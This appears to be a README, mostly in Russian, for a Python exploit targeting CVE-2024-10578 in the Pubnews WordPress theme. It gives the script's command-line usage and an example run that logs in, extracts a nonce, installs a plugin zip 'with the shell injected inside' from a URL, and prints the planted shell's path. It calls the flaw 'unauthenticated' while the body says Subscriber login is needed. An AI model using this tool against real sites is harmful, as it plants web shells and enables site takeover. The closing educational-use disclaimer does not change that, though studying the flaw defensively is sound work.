
Pubnews <= 1.0.7 - Неаутентифицированная произвольная установка плагинов
Тема Pubnews для WordPress уязвима к неавторизованной установке произвольных плагинов из-за отсутствия проверки прав доступа в функции pubnews_importer_plugin_action_for_notice() во всех версиях до 1.0.7 включительно. Эта уязвимость позволяет аутентифицированным атакующим с уровнем доступа Subscriber и выше устанавливать произвольные плагины, которые могут быть использованы для эксплуатации других уязвимостей.
Этот скрипт эксплуатирует уязвимость в теме Pubnews для установки произвольного плагина из предоставленного URL-адреса. Плагин может содержать вредоносную оболочку или любую другую нагрузку.
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
Этот скрипт предназначен только для образовательных целей. Автор не одобряет использование этого скрипта для незаконных действий. Используйте его ответственно и только на системах, на тестирование которых у вас есть явное разрешение.
Автор: Nxploited | Khaled Alenazi